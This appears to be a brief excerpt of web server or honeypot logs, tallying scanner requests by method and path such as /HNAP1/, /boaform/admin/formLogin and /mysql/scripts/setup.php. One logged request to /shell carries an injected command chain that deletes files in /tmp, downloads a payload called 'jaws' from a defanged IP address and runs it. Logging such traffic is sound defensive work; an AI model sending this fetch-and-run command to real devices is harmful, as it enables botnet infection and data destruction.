| 4 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /mysql/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+85[.]31[.]46[.]179/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /user/login/ |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | HEAD | /robots.txt |
HTTP/1.0 |
| 2 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
